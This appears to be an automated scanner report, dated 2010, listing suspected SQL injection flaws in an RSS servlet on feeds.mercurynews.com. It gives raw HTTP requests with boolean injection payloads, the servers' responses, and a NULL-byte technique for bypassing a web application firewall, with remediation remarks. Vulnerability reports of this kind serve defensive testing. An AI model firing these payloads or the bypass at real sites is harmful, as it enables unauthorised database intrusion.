Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:22 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200927.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:26 GMT
Content-Length: 0
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:32 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200929.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:32 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:03 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:03 GMT
Date: Tue, 07 Dec 2010 23:22:03 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:15 GMT
Date: Tue, 07 Dec 2010 23:22:15 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12838428'%20or%201%3d1--%20 and 12838428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi12838428'%20or%201%3d1--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:57 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi12838428'%20or%201%3d2--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:57 GMT
Date: Tue, 07 Dec 2010 23:21:57 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13599438%20or%201%3d1--%20 and 13599438%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d1--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:10 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d2--%20/200935.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:10 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200936.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:35 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200936.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:35 GMT Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13962808%20or%201%3d1--%20 and 13962808%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d1--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d2--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:16 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11601329'%20or%201%3d1--%20 and 11601329'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d1--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:30 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d2--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:31 GMT
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet/568%00'/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:49 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet/568%00''/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:49 GMT
Content-Length: 0
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 84008678'%20or%201%3d1--%20 and 84008678'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d1--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:46 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d2--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:46 GMT
Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:48 GMT
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 424
Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 0
Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /mngi/rss/CustomRssServlet%00'/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:44 GMT
Connection: close
<h1>Bad Request (Invalid URL)</h1>
Request 2
GET /mngi/rss/CustomRssServlet%00''/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:44 GMT
Content-Length: 0
Connection: close
